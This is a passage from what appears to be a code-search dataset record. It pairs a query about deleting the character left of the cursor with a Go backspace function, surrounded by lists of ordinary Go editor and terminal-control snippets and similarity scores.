line %v\", line)\n\t}\n\toriginal := s.lines[line].String()\n\tif line < len(s.lines)-1 {\n\t\tcopy(s.lines[line:], s.lines[line+1:])\n\t}\n\ts.lines[len(s.lines)-1] = nil // or the zero value of T\n\ts.lines = s.lines[:len(s.lines)-1]\n\tcs := s.undoFac()\n\tcs.ChangeLine(line, original, \"\")\n\tcs.RemoveLine(line)\n\ts.AddUndoSet(cs)\n\treturn original, nil\n}", "func ClearLine(conn io.Writer) {\n\tclearline := \"\\x1B[2K\"\n\tWrite(conn, clearline+\"\\r\", ColorModeNone)\n}", "func (e *Escpos) Cut() {\n\te.Write(\"\\x1DVA0\")\n}", "func (s *source) removeCursor(rm *cursor) {\n\ts.cursorsMu.Lock()\n\tdefer s.cursorsMu.Unlock()\n\n\tif rm.cursorsIdx != len(s.cursors)-1 {\n\t\ts.cursors[rm.cursorsIdx], s.cursors[len(s.cursors)-1] = s.cursors[len(s.cursors)-1], nil\n\t\ts.cursors[rm.cursorsIdx].cursorsIdx = rm.cursorsIdx\n\t} else {\n\t\ts.cursors[rm.cursorsIdx] = nil // do not let the memory hang around\n\t}\n\n\ts.cursors = s.cursors[:len(s.cursors)-1]\n\tif s.cursorsStart == len(s.cursors) {\n\t\ts.cursorsStart = 0\n\t}\n}", "func (tv *TextView) Redo() {\n\twupdt := tv.TopUpdateStart()\n\tdefer tv.TopUpdateEnd(wupdt)\n\ttbe := tv.Buf.Redo()\n\tif tbe != nil {\n\t\tif tbe.Delete {\n\t\t\ttv.SetCursorShow(tbe.Reg.Start)\n\t\t} else {\n\t\t\ttv.SetCursorShow(tbe.Reg.End)\n\t\t}\n\t} else {\n\t\ttv.ScrollCursorToCenterIfHidden()\n\t}\n\ttv.SavePosHistory(tv.CursorPos)\n}", "func (e *LineEditor) CursorEnd() {\n\te.Cx = len(e.Row)\n}", "func (s *Store) Delete(ln, col, cnt int) error {\n\tif ln < 0 || ln >= len(s.lines) {\n\t\treturn fmt.Errorf(\"Delete: line %v out of range\", ln)\n\t}\n\ts.lines[ln].delete(col, cnt)\n\ts.AddUndoSet(s.lines[ln].changeSet(ln, s.undoFac))\n\treturn nil\n}", "func CursorBackward(c uint) {\n\temitEscape(\"D\", c)\n}", "func (mc *MultiCursor) Clear() {\n\tmc.cursors = mc.cursors[0:1]\n}", "func (e *LineEditor) InsertChar(c rune) {\n\n\t// store a reference to the working row to improve readability\n\tsrc := e.Row\n\n\tdest := make([]rune, len(src)+1)\n\tcopy(dest, src[:e.Cx])\n\tcopy(dest[e.Cx+1:], src[e.Cx:])\n\tdest[e.Cx] = c\n\n\te.Row = dest\n\te.Cx++\n}", "func (s *dbStore) DelCmd(seq int) error {\n\treturn s.db.Update(func(tx *bolt.Tx) error {\n\t\tb := tx.Bucket([]byte(bucketCmd))\n\t\treturn b.Delete(marshalSeq(uint64(seq)))\n\t})\n}", "func (cur *cursor) invalidateAtEnd() {\n\tcur.idx = int(cur.nd.count)\n}", "func ClearLine() {\n\tfmt.Printf(CSI+EraseLineSeq, 2)\n}", "func (s *Screen) ClearFromCursor(eof bool) {\n\tif !eof {\n\t\tfmt.Fprint(s.Terminal, \"\\u001B[0K\")\n\t} else {\n\t\tfmt.Fprint(s.Terminal, \"\\u001B[0J\")\n\t}\n}", "func (c *CmdBuff) ClearText(fire bool) {\n\tc.mx.Lock()\n\t{\n\t\tc.buff, c.suggestion = c.buff[:0], \"\"\n\t}\n\tc.mx.Unlock()\n\n\tif fire {\n\t\tc.fireBufferCompleted(c.GetText(), c.GetSuggestion())\n\t}\n}", "func ClearLineEnd() {\n\tfmt.Printf(\"\\033[0K\")\n}", "func ClearLineEnd() {\n\tfmt.Printf(\"\\033[0K\")\n}", "func (tv *TextView) Cut() *TextBufEdit {\n\tif !tv.HasSelection() {\n\t\treturn nil\n\t}\n\twupdt := tv.TopUpdateStart()\n\tdefer tv.TopUpdateEnd(wupdt)\n\torg := tv.SelectReg.Start\n\tcut := tv.DeleteSelection()\n\tif cut != nil {\n\t\tcb := cut.ToBytes()\n\t\toswin.TheApp.ClipBoard(tv.Viewport.Win.OSWin).Write(mimedata.NewTextBytes(cb))\n\t\tTextViewClipHistAdd(cb)\n\t}\n\ttv.SetCursorShow(org)\n\ttv.SavePosHistory(tv.CursorPos)\n\treturn cut\n}", "func (m *Maps) RemoveCharacter(c *character.Character) {\n\tl := c.Location()\n\tm.active[l.Y][l.X] = c.Displaced\n\tc.Displaced = nil\n}", "func ClearLinePartialBackward() {\n\temitEscape(\"K\", 1)\n}", "func (c *Cursor) Last() {\n\tc.pos = c.end - 1\n}", "func (a *Autocompleter) Delete() error {\n\tconn := a.pool.Get()\n\tdefer conn.Close()\n\n\t_, err := conn.Do(\"DEL\", a.name)\n\treturn err\n}", "func (c *CharacterCollection) DeleteCharacter(characterid string) error {\n\tif c.charcterCollection == nil {\n\t\tc.setupCollection()\n\t}\n\terr := c.charcterCollection.Remove(bson.M{\"id\": characterid})\n\tif err != nil {\n\t\treturn err\n\t}\n\treturn nil\n}", "func clearRow(row int) error {\n\terr := setCursorRow(row)\n\tif err != nil {\n\t\tpanic(err)\n\t}\n\tansi.EraseInLine(2)\n\treturn nil\n}", "func (r *WorkbookRangeFontRequest) Delete(ctx context.Context) error {\n\treturn r.JSONRequest(ctx, \"DELETE\", \"\", nil, nil)\n}", "func Delete(str string, pattern string) string {\n\treturn xstrings.Delete(str, pattern)\n}", "func clearCharData(chars map[int]*char.Char, c *char.Char) {\n\n}", "func (ps *Parser) doubleChar() string {\n\tif len(ps.Runes) >= ps.Offset+2 {\n\t\treturn string(ps.Runes[ps.Offset : ps.Offset+2])\n\t}\n\treturn \"\"\n}", "func (c *cursor) unset() {\n\tc.useState = 0\n\tc.setOffset(cursorOffset{\n\t\toffset: -1,\n\t\tlastConsumedEpoch: -1,\n\t})\n}", "func dropCR(data []byte) []byte {\n\tif len(data) > 0 && data[len(data)-1] == '\\r' {\n\t\tdata = data[0 : len(data)-1]\n\t}\n\tif len(data) > 0 && data[len(data)-3] == '\u001b' {\n\t\tdata = data[0 : len(data)-3]\n\t}\n\treturn data\n}", "func (w *Win) Delete(q0, q1 int64) (n int) {\n\tif EnableUndoExperiment {\n\t\tprintln(fmt.Sprintf(\"#%d,#%d d\\n\", q0, q1))\n\t}\n\treturn w.delete(q0, q1)\n}", "func (s *BaseCGListener) ExitAnynonescapedchar(ctx *AnynonescapedcharContext) {}", "func (p *Process) CmdDelete(pac teoapi.Packet) (err error) {\n\tdata := pac.RemoveTrailingZero(pac.Data())\n\trequest := cdb.KeyValue{Cmd: pac.Cmd()}\n\tif err = request.UnmarshalText(data); err != nil {\n\t\treturn\n\t} else if err = p.tcdb.Delete(request.Key); err != nil {\n\t\treturn\n\t}\n\t// Return only Value for text requests and all fields for json\n\tresponce := request\n\tresponce.Value = nil\n\tif !request.RequestInJSON {\n\t\t_, err = p.tcdb.con.SendAnswer(pac, pac.Cmd(), responce.Value)\n\t} else if retdata, err := responce.MarshalText(); err == nil {\n\t\t_, err = p.tcdb.con.SendAnswer(pac, pac.Cmd(), retdata)\n\t}\n\treturn\n}", "func (i *Input) CursorRight() {\n\tif i.Pos < i.Buffer.Len() {\n\t\ti.Pos++\n\t}\n}", "func (c *Cursor) Previous() {\n\tc.pos--\n}", "func (ps *Parser) currentChar() string {\n\treturn string(ps.Runes[ps.Offset])\n}", "func RemoveCharacter(db *sql.DB) http.HandlerFunc {\n\treturn func(w http.ResponseWriter, r *http.Request) {\n\t\tvars := mux.Vars(r)\n\t\tresponse := make(map[string]interface{})\n\t\tid, err := strconv.ParseInt(vars[\"id\"], 10, 64)\n\n\t\tif err != nil {\n\t\t\thttp.Error(w, err.Error(), http.StatusBadRequest)\n\t\t\treturn\n\t\t}\n\n\t\trepo := repositories.NewCharacterRepository(db)\n\n\t\taffected, err := repo.Remove(id)\n\n\t\tif err != nil {\n\t\t\thttp.Error(w, err.Error(), getCode(err))\n\t\t\treturn\n\t\t}\n\n\t\tresponse[\"rows_affected\"] = affected\n\t\tw.WriteHeader(http.StatusCreated)\n\n\t\tjson.NewEncoder(w).Encode(response)\n\t}\n}", "func CursorPosX(x int) string {\n\treturn Esc + strconv.Itoa(x+1) + \"G\"\n}", "func (e *LineEditor) CursorLeft() {\n\n\tif e.Cx > 0 {\n\t\te.Cx--\n\t}\n}", "func ClearLineStart() {\n\tfmt.Printf(\"\\033[1K\")\n}", "func ClearLineStart() {\n\tfmt.Printf(\"\\033[1K\")\n}", "func TextDeleteLines(n int) string {\n\treturn Esc + strconv.Itoa(n) + \"M\"\n}", "func SaveCursorPosition() {\n\tfmt.Printf(\"\\033[s\")\n}", "func SaveCursorPosition() {\n\tfmt.Printf(\"\\033[s\")\n}", "func ClearLine(headerWidth int) string {\n\tout := \"\"\n\tout += fmt.Sprint(cursorAbsoluteLeft)\n\tout += fmt.Sprint(clearLine)\n\tout += fmt.Sprint(cursorRight(headerWidth))\n\n\treturn out\n}", "func (w *VT100Writer) EraseLine() {\n\tw.WriteRaw([]byte{0x1b, '[', '2', 'K'})\n}" ]
[ "0.75402987", "0.6650366", "0.6263558", "0.6129098", "0.60061044", "0.58697176", "0.58670366", "0.58643687", "0.5804483", "0.57899517", "0.57389545", "0.57170504", "0.57014334", "0.5661418", "0.56473815", "0.5607732", "0.5556907", "0.5527127", "0.5519712", "0.55096525", "0.55058753", "0.54989487", "0.54047674", "0.54039717", "0.5369205", "0.535673", "0.5336893", "0.5214302", "0.52037156", "0.5201378", "0.5177923", "0.51773745", "0.5147317", "0.5139365", "0.5091773", "0.50885123", "0.5083387", "0.5075872", "0.5071676", "0.5071676", "0.50574005", "0.5042146", "0.5041605", "0.50274295", "0.5022424", "0.49766806", "0.49684674", "0.49507004", "0.4946999", "0.49233335", "0.49233335", "0.4908048", "0.49065152", "0.48844832", "0.48752415", "0.4868101", "0.4867577", "0.4852436", "0.48328292", "0.4832496", "0.48316228", "0.48239428", "0.48051357", "0.47878817", "0.47848064", "0.47740325", "0.477349", "0.4766449", "0.4754785", "0.47502586", "0.47502586", "0.47492102", "0.47307605", "0.47276235", "0.47111976", "0.47085917", "0.4704426", "0.46927956", "0.46880203", "0.46646068", "0.4662607", "0.4654825", "0.4652285", "0.46487346", "0.46387124", "0.463515", "0.46217275", "0.46146345", "0.46134126", "0.4610013", "0.46080527", "0.460494", "0.46004903", "0.45982313", "0.45982313", "0.459351", "0.4580309", "0.4580309", "0.4578233", "0.45660895" ]
0.5917855
5
delete the character to the left of the current cursor position
func (ls *linestate) editBackspace() { if ls.pos > 0 && len(ls.buf) > 0 { ls.buf = append(ls.buf[:ls.pos-1], ls.buf[ls.pos:]...) ls.pos-- ls.refreshLine() } }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func (e *LineEditor) DelChar() {\n\n\t// different handling for at the beginning of the line or middle of line\n\tif e.Cx > 0 {\n\t\trow := e.Row\n\t\tcopy(row[e.Cx-1:], row[e.Cx:])\n\t\trow = row[:len(row)-1]\n\t\te.Row = row\n\t\te.Cx--\n\t}\n}", "func (m *Model) deleteWordLeft() bool {\n\tif m.pos == 0 || len(m.value) == 0 {\n\t\treturn false\n\t}\n\n\tif m.EchoMode != EchoNormal {\n\t\treturn m.deleteBeforeCursor()\n\t}\n\n\t// Linter note: it's critical that we acquire the initial cursor position\n\t// here prior to altering it via SetCursor() below. As such, moving this\n\t// call into the corresponding if clause does not apply here.\n\toldPos := m.pos //nolint:ifshort\n\n\tblink := m.setCursor(m.pos - 1)\n\tfor unicode.IsSpace(m.value[m.pos]) {\n\t\tif m.pos <= 0 {\n\t\t\tbreak\n\t\t}\n\t\t// ignore series of whitespace before cursor\n\t\tblink = m.setCursor(m.pos - 1)\n\t}\n\n\tfor m.pos > 0 {\n\t\tif !unicode.IsSpace(m.value[m.pos]) {\n\t\t\tblink = m.setCursor(m.pos - 1)\n\t\t} else {\n\t\t\tif m.pos > 0 {\n\t\t\t\t// keep the previous space\n\t\t\t\tblink = m.setCursor(m.pos + 1)\n\t\t\t}\n\t\t\tbreak\n\t\t}\n\t}\n\n\tif oldPos > len(m.value) {\n\t\tm.value = m.value[:m.pos]\n\t} else {\n\t\tm.value = append(m.value[:m.pos], m.value[oldPos:]...)\n\t}\n\n\treturn blink\n}", "func (i *Input) CursorLeft() {\n\tif i.Pos > 0 {\n\t\ti.Pos--\n\t}\n}", "func (e *LineEditor) CursorLeft() {\n\n\tif e.Cx > 0 {\n\t\te.Cx--\n\t}\n}", "func RestoreCursorPos() {\n\temitEscape(\"u\")\n}", "func (tv *TextView) CursorDelete(steps int) {\n\twupdt := tv.TopUpdateStart()\n\tdefer tv.TopUpdateEnd(wupdt)\n\ttv.ValidateCursor()\n\tif tv.HasSelection() {\n\t\ttv.DeleteSelection()\n\t\treturn\n\t}\n\t// note: no update b/c signal from buf will drive update\n\torg := tv.CursorPos\n\ttv.CursorForward(steps)\n\ttv.Buf.DeleteText(org, tv.CursorPos, true, true)\n\ttv.SetCursorShow(org)\n}", "func (m *Model) deleteWordRight() bool {\n\tif m.pos >= len(m.value) || len(m.value) == 0 {\n\t\treturn false\n\t}\n\n\tif m.EchoMode != EchoNormal {\n\t\treturn m.deleteAfterCursor()\n\t}\n\n\toldPos := m.pos\n\tm.setCursor(m.pos + 1)\n\tfor unicode.IsSpace(m.value[m.pos]) {\n\t\t// ignore series of whitespace after cursor\n\t\tm.setCursor(m.pos + 1)\n\n\t\tif m.pos >= len(m.value) {\n\t\t\tbreak\n\t\t}\n\t}\n\n\tfor m.pos < len(m.value) {\n\t\tif !unicode.IsSpace(m.value[m.pos]) {\n\t\t\tm.setCursor(m.pos + 1)\n\t\t} else {\n\t\t\tbreak\n\t\t}\n\t}\n\n\tif m.pos > len(m.value) {\n\t\tm.value = m.value[:oldPos]\n\t} else {\n\t\tm.value = append(m.value[:oldPos], m.value[m.pos:]...)\n\t}\n\n\treturn m.setCursor(oldPos)\n}", "func (m *Model) deleteBeforeCursor() bool {\n\tm.value = m.value[m.pos:]\n\tm.offset = 0\n\treturn m.setCursor(0)\n}", "func (m *Model) deleteAfterCursor() bool {\n\tm.value = m.value[:m.pos]\n\treturn m.setCursor(len(m.value))\n}", "func CursorMove(x, y int) string {\n\tvar s string\n\tif x < 0 {\n\t\ts = Esc + strconv.Itoa(-x) + \"D\"\n\t} else if x > 0 {\n\t\ts = Esc + strconv.Itoa(x) + \"C\"\n\t}\n\tif y < 0 {\n\t\ts += Esc + strconv.Itoa(-y) + \"A\"\n\t} else if y > 0 {\n\t\ts += Esc + strconv.Itoa(y) + \"B\"\n\t}\n\treturn s\n}", "func CursorPosX(x int) string {\n\treturn Esc + strconv.Itoa(x+1) + \"G\"\n}", "func (c *Console) Left(n Int) *Console {\n\tPrint(_CSI + n.ToString() + \"D\")\n\treturn c\n}", "func (d *Display) CursorLeft() error {\n\t_, err := d.port.Write([]byte(CursorLeft))\n\treturn err\n}", "func (i *Input) backspace() {\n\tcurLine := i.lines[i.cursorLineIndex]\n\t// at the beginning of the buffer, nothing to do\n\tif len(curLine) == 0 && i.cursorLineIndex == 0 {\n\t\treturn\n\t}\n\n\t// at the beginning of a line somewhere in the buffer\n\tif i.cursorLinePos == 0 {\n\t\tprevLine := i.lines[i.cursorLineIndex-1]\n\t\t// remove the newline character from the prevline\n\t\tprevLine = prevLine[:len(curLine)-1] + curLine\n\t\ti.lines = append(i.lines[:i.cursorLineIndex], i.lines[i.cursorLineIndex+1:]...)\n\t\ti.cursorLineIndex--\n\t\ti.cursorLinePos = len(prevLine) - 1\n\t\treturn\n\t}\n\n\t// I'm at the end of a line\n\tif i.cursorLinePos == len(curLine)-1 {\n\t\ti.lines[i.cursorLineIndex] = curLine[:len(curLine)-1]\n\t\ti.cursorLinePos--\n\t\treturn\n\t}\n\n\t// I'm in the middle of a line\n\ti.lines[i.cursorLineIndex] = curLine[:i.cursorLinePos-1] + curLine[i.cursorLinePos:]\n\ti.cursorLinePos--\n}", "func (i *Input) Backspace() {\n\tif i.Pos > 0 {\n\t\ti.Buffer.RemoveRune(i.Pos - 1)\n\t\ti.Pos--\n\t}\n}", "func (ls *linestate) deletePrevWord() {\n\toldPos := ls.pos\n\t// remove spaces\n\tfor ls.pos > 0 && ls.buf[ls.pos-1] == ' ' {\n\t\tls.pos--\n\t}\n\t// remove word\n\tfor ls.pos > 0 && ls.buf[ls.pos-1] != ' ' {\n\t\tls.pos--\n\t}\n\tls.buf = append(ls.buf[:ls.pos], ls.buf[oldPos:]...)\n\tls.refreshLine()\n}", "func (tv *TextView) CursorDeleteWord(steps int) {\n\twupdt := tv.TopUpdateStart()\n\tdefer tv.TopUpdateEnd(wupdt)\n\ttv.ValidateCursor()\n\tif tv.HasSelection() {\n\t\ttv.DeleteSelection()\n\t\treturn\n\t}\n\t// note: no update b/c signal from buf will drive update\n\torg := tv.CursorPos\n\ttv.CursorForwardWord(steps)\n\ttv.Buf.DeleteText(org, tv.CursorPos, true, true)\n\ttv.SetCursorShow(org)\n}", "func (ls *linestate) editDelete() {\n\tif len(ls.buf) > 0 && ls.pos < len(ls.buf) {\n\t\tls.buf = append(ls.buf[:ls.pos], ls.buf[ls.pos+1:]...)\n\t\tls.refreshLine()\n\t}\n}", "func (ls *linestate) editMoveLeft() {\n\tif ls.pos > 0 {\n\t\tls.pos--\n\t\tls.refreshLine()\n\t}\n}", "func (e *Editor) Delete(runes int) {\n\tif runes == 0 {\n\t\treturn\n\t}\n\n\tif l := e.caret.end.ofs - e.caret.start.ofs; l != 0 {\n\t\te.caret.start.ofs = e.editBuffer.deleteRunes(e.caret.start.ofs, l)\n\t\trunes -= sign(runes)\n\t}\n\n\te.caret.start.ofs = e.editBuffer.deleteRunes(e.caret.start.ofs, runes)\n\te.caret.start.xoff = 0\n\te.ClearSelection()\n\te.invalidate()\n}", "func (e *Editor) ClearSelection() {\n\te.caret.end = e.caret.start\n}", "func (e *Editor) prepend(s string) {\n\tif e.singleLine {\n\t\ts = strings.ReplaceAll(s, \"\\n\", \" \")\n\t}\n\te.caret.start.ofs = e.editBuffer.deleteRunes(e.caret.start.ofs,\n\t\te.caret.end.ofs-e.caret.start.ofs) // Delete any selection first.\n\te.editBuffer.prepend(e.caret.start.ofs, s)\n\te.caret.start.xoff = 0\n\te.invalidate()\n}", "func Left(text string, size int) string {\n\tspaces := size - Length(text)\n\tif spaces <= 0 {\n\t\treturn text\n\t}\n\n\tvar buffer bytes.Buffer\n\tbuffer.WriteString(text)\n\n\tfor i := 0; i < spaces; i++ {\n\t\tbuffer.WriteString(space)\n\t}\n\treturn buffer.String()\n}", "func (e *Editor) deleteWord(distance int) {\n\tif distance == 0 {\n\t\treturn\n\t}\n\n\te.makeValid()\n\n\tif e.caret.start.ofs != e.caret.end.ofs {\n\t\te.Delete(1)\n\t\tdistance -= sign(distance)\n\t}\n\tif distance == 0 {\n\t\treturn\n\t}\n\n\t// split the distance information into constituent parts to be\n\t// used independently.\n\twords, direction := distance, 1\n\tif distance < 0 {\n\t\twords, direction = distance*-1, -1\n\t}\n\t// atEnd if offset is at or beyond either side of the buffer.\n\tatEnd := func(offset int) bool {\n\t\tidx := e.caret.start.ofs + offset*direction\n\t\treturn idx <= 0 || idx >= e.editBuffer.len()\n\t}\n\t// next returns the appropriate rune given the direction and offset.\n\tnext := func(offset int) (r rune) {\n\t\tidx := e.caret.start.ofs + offset*direction\n\t\tif idx < 0 {\n\t\t\tidx = 0\n\t\t} else if idx > e.editBuffer.len() {\n\t\t\tidx = e.editBuffer.len()\n\t\t}\n\t\tif direction < 0 {\n\t\t\tr, _ = e.editBuffer.runeBefore(idx)\n\t\t} else {\n\t\t\tr, _ = e.editBuffer.runeAt(idx)\n\t\t}\n\t\treturn r\n\t}\n\tvar runes = 1\n\tfor ii := 0; ii < words; ii++ {\n\t\tif r := next(runes); unicode.IsSpace(r) {\n\t\t\tfor r := next(runes); unicode.IsSpace(r) && !atEnd(runes); r = next(runes) {\n\t\t\t\trunes += 1\n\t\t\t}\n\t\t} else {\n\t\t\tfor r := next(runes); !unicode.IsSpace(r) && !atEnd(runes); r = next(runes) {\n\t\t\t\trunes += 1\n\t\t\t}\n\t\t}\n\t}\n\te.Delete(runes * direction)\n}", "func (i *Input) CursorRight() {\n\tif i.Pos < i.Buffer.Len() {\n\t\ti.Pos++\n\t}\n}", "func TextEraseChars(n int) string {\n\treturn Esc + strconv.Itoa(n) + \"X\"\n}", "func CursorPos(x, y int) string {\n\treturn Esc + strconv.Itoa(y+1) + \";\" + strconv.Itoa(x+1) + \"H\"\n}", "func SaveCursorPos() {\n\temitEscape(\"s\")\n}", "func (l *ListInfo) deleteRune() {\n\tsc := []rune(l.Keyword)\n\tl.Keyword = string(sc[:(len(sc) - 1)])\n}", "func RestoreCursorPosition() {\n\tfmt.Printf(\"\\033[u\")\n}", "func RestoreCursorPosition() {\n\tfmt.Printf(\"\\033[u\")\n}", "func (tv *TextView) CursorBackspace(steps int) {\n\twupdt := tv.TopUpdateStart()\n\tdefer tv.TopUpdateEnd(wupdt)\n\ttv.ValidateCursor()\n\torg := tv.CursorPos\n\tif tv.HasSelection() {\n\t\torg = tv.SelectReg.Start\n\t\ttv.DeleteSelection()\n\t\ttv.SetCursorShow(org)\n\t\treturn\n\t}\n\t// note: no update b/c signal from buf will drive update\n\ttv.CursorBackward(steps)\n\ttv.ScrollCursorToCenterIfHidden()\n\ttv.RenderCursor(true)\n\ttv.Buf.DeleteText(tv.CursorPos, org, true, true)\n}", "func (ls *linestate) editInsert(r rune) {\n\tls.buf = append(ls.buf[:ls.pos], append([]rune{r}, ls.buf[ls.pos:]...)...)\n\tls.pos++\n\tls.refreshLine()\n}", "func MoveTopLeft() {\n\tfmt.Print(\"\\033[H\")\n}", "func (e *LineEditor) CursorRight() {\n\t// right moves only if we're within a valid line.\n\t// for past EOF, there's no movement\n\tif e.Cx < len(e.Row) {\n\t\te.Cx++\n\t}\n}", "func (tv *TextView) CursorBackspaceWord(steps int) {\n\twupdt := tv.TopUpdateStart()\n\tdefer tv.TopUpdateEnd(wupdt)\n\ttv.ValidateCursor()\n\torg := tv.CursorPos\n\tif tv.HasSelection() {\n\t\ttv.DeleteSelection()\n\t\ttv.SetCursorShow(org)\n\t\treturn\n\t}\n\t// note: no update b/c signal from buf will drive update\n\ttv.CursorBackwardWord(steps)\n\ttv.ScrollCursorToCenterIfHidden()\n\ttv.RenderCursor(true)\n\ttv.Buf.DeleteText(tv.CursorPos, org, true, true)\n}", "func (ebox *Editbox) moveCursorDown() {\n\tif ebox.wrap {\n\t\ted := ebox.editor\n\t\tline := ed.currentLine()\n\t\t// Try to move within current line\n\t\tif ed.cursor.x+ebox.width < len(line.text) {\n\t\t\ted.cursor.x += ebox.width\n\t\t\treturn\n\t\t}\n\t\tif ebox.cursor.x+(len(line.text)-ed.cursor.x)-1 >= ebox.width {\n\t\t\ted.cursor.x = line.lastRuneX()\n\t\t\treturn\n\t\t}\n\t\t// Jump to next line\n\t\tif ed.cursor.y+1 > len(ed.lines)-1 {\n\t\t\treturn\n\t\t}\n\t\ted.cursor.y += 1\n\t\tline = ed.currentLine()\n\t\tif len(line.text) == 0 {\n\t\t\ted.cursor.x = 0\n\t\t\treturn\n\t\t}\n\t\tx, _ := ebox.editorToBox(ed.lastx, 0)\n\t\tif x >= len(line.text) {\n\t\t\ted.cursor.x = line.lastRuneX()\n\t\t} else {\n\t\t\ted.cursor.x = x\n\t\t}\n\t} else {\n\t\tebox.editor.moveCursorVert(+1)\n\t}\n}", "func ClearLinePartialForward() {\n\temitEscape(\"K\")\n}", "func (c *Cursor) Previous() {\n\tc.pos--\n}", "func (m *Model) wordLeft() bool {\n\tif m.pos == 0 || len(m.value) == 0 {\n\t\treturn false\n\t}\n\n\tif m.EchoMode != EchoNormal {\n\t\treturn m.cursorStart()\n\t}\n\n\tblink := false\n\ti := m.pos - 1\n\tfor i >= 0 {\n\t\tif unicode.IsSpace(m.value[i]) {\n\t\t\tblink = m.setCursor(m.pos - 1)\n\t\t\ti--\n\t\t} else {\n\t\t\tbreak\n\t\t}\n\t}\n\n\tfor i >= 0 {\n\t\tif !unicode.IsSpace(m.value[i]) {\n\t\t\tblink = m.setCursor(m.pos - 1)\n\t\t\ti--\n\t\t} else {\n\t\t\tbreak\n\t\t}\n\t}\n\n\treturn blink\n}", "func CursorForward(c uint) {\n\temitEscape(\"C\", c)\n}", "func (r *Row) insertChar (char string, index int) {\n content := r.content.Bytes()\n newBuffer := bytes.NewBuffer(nil)\n\n newBuffer.Write(content[:index])\n newBuffer.Write([]byte(char))\n newBuffer.Write(content[index:])\n\n r.content = newBuffer\n r.size = newBuffer.Len()\n}", "func (l *lexer) backup() {\n\tl.pos -= l.width\n\tl.runeCnt--\n}", "func (r *runestring) Del(pos ...int) {\n\tfor _, i := range pos {\n\t\tif i >= 0 && i <= len(*r) {\n\t\t\t*r = append((*r)[:i], (*r)[i+1:]...)\n\t\t}\n\t}\n}", "func (tv *TextView) Redo() {\n\twupdt := tv.TopUpdateStart()\n\tdefer tv.TopUpdateEnd(wupdt)\n\ttbe := tv.Buf.Redo()\n\tif tbe != nil {\n\t\tif tbe.Delete {\n\t\t\ttv.SetCursorShow(tbe.Reg.Start)\n\t\t} else {\n\t\t\ttv.SetCursorShow(tbe.Reg.End)\n\t\t}\n\t} else {\n\t\ttv.ScrollCursorToCenterIfHidden()\n\t}\n\ttv.SavePosHistory(tv.CursorPos)\n}", "func (tb *TextBuf) Redo() *TextBufEdit {\n\tif tb.UndoPos >= len(tb.Undos) {\n\t\treturn nil\n\t}\n\ttbe := tb.Undos[tb.UndoPos]\n\tif tbe.Delete {\n\t\ttb.DeleteText(tbe.Reg.Start, tbe.Reg.End, false, true)\n\t} else {\n\t\ttb.InsertText(tbe.Reg.Start, tbe.ToBytes(), false, true)\n\t}\n\ttb.UndoPos++\n\treturn tbe\n}", "func CursorBackward(c uint) {\n\temitEscape(\"D\", c)\n}", "func (c *Canvas) Delete(cr *Cursor) error {\n\tif cr.X >= canvasWidth || cr.Y >= canvasHeight {\n\t\treturn fmt.Errorf(`(%d, %d) is out of the Canvas size`, cr.X, cr.Y)\n\t}\n\n\t(*c)[cr.Y][cr.X] = 0\n\n\treturn nil\n}", "func CursorUp(count int) string {\n\treturn fmt.Sprintf(\"%s%dA\", csi, count)\n}", "func (e *Escpos) Cut() {\n\te.Write(\"\\x1DVA0\")\n}", "func (tm *Term) FixLeft() error {\n\ttm.FixCols = ints.MaxInt(tm.FixCols-1, 0)\n\treturn tm.Draw()\n}", "func (tb *TextBuf) DeleteText(st, ed TextPos, saveUndo, signal bool) *TextBufEdit {\n\tst = tb.ValidPos(st)\n\ted = tb.ValidPos(ed)\n\tif st == ed {\n\t\treturn nil\n\t}\n\tif !st.IsLess(ed) {\n\t\tlog.Printf(\"giv.TextBuf DeleteText: starting position must be less than ending!: st: %v, ed: %v\\n\", st, ed)\n\t\treturn nil\n\t}\n\ttb.FileModCheck() // note: could bail if modified but not clear that is better?\n\ttbe := tb.Region(st, ed)\n\ttb.SetChanged()\n\ttb.LinesMu.Lock()\n\ttbe.Delete = true\n\tif ed.Ln == st.Ln {\n\t\ttb.Lines[st.Ln] = append(tb.Lines[st.Ln][:st.Ch], tb.Lines[st.Ln][ed.Ch:]...)\n\t\ttb.LinesMu.Unlock()\n\t\tif saveUndo {\n\t\t\ttb.SaveUndo(tbe)\n\t\t}\n\t\ttb.LinesEdited(tbe)\n\t} else {\n\t\t// first get chars on start and end\n\t\tstln := st.Ln + 1\n\t\tcpln := st.Ln\n\t\ttb.Lines[st.Ln] = tb.Lines[st.Ln][:st.Ch]\n\t\teoedl := len(tb.Lines[ed.Ln][ed.Ch:])\n\t\tvar eoed []rune\n\t\tif eoedl > 0 { // save it\n\t\t\teoed = make([]rune, eoedl)\n\t\t\tcopy(eoed, tb.Lines[ed.Ln][ed.Ch:])\n\t\t}\n\t\ttb.Lines = append(tb.Lines[:stln], tb.Lines[ed.Ln+1:]...)\n\t\tif eoed != nil {\n\t\t\ttb.Lines[cpln] = append(tb.Lines[cpln], eoed...)\n\t\t}\n\t\ttb.NLines = len(tb.Lines)\n\t\ttb.LinesMu.Unlock()\n\t\tif saveUndo {\n\t\t\ttb.SaveUndo(tbe)\n\t\t}\n\t\ttb.LinesDeleted(tbe)\n\t}\n\n\tif signal {\n\t\ttb.TextBufSig.Emit(tb.This(), int64(TextBufDelete), tbe)\n\t}\n\tif tb.Autosave {\n\t\tgo tb.AutoSave()\n\t}\n\treturn tbe\n}", "func CursorUp(r uint) {\n\temitEscape(\"A\", r)\n}", "func (tv *TextView) CursorKill() {\n\twupdt := tv.TopUpdateStart()\n\tdefer tv.TopUpdateEnd(wupdt)\n\ttv.ValidateCursor()\n\torg := tv.CursorPos\n\tpos := tv.CursorPos\n\n\tatEnd := false\n\tif wln := tv.WrappedLines(pos.Ln); wln > 1 {\n\t\tsi, ri, _ := tv.WrappedLineNo(pos)\n\t\tllen := len(tv.Renders[pos.Ln].Spans[si].Text)\n\t\tif si == wln-1 {\n\t\t\tllen--\n\t\t}\n\t\tatEnd = (ri == llen)\n\t} else {\n\t\tllen := tv.Buf.LineLen(pos.Ln)\n\t\tatEnd = (tv.CursorPos.Ch == llen)\n\t}\n\tif atEnd {\n\t\ttv.CursorForward(1)\n\t} else {\n\t\ttv.CursorEndLine()\n\t}\n\ttv.Buf.DeleteText(org, tv.CursorPos, true, true)\n\ttv.SetCursorShow(org)\n}", "func (r *Render) clear(cursor int) {\n\tr.move(cursor, 0)\n\tr.out.EraseDown()\n}", "func (lx *Lexer) backup() {\n\tlx.pos -= lx.width\n}", "func moveCursorLeft(positionCursor *int, numberDigits 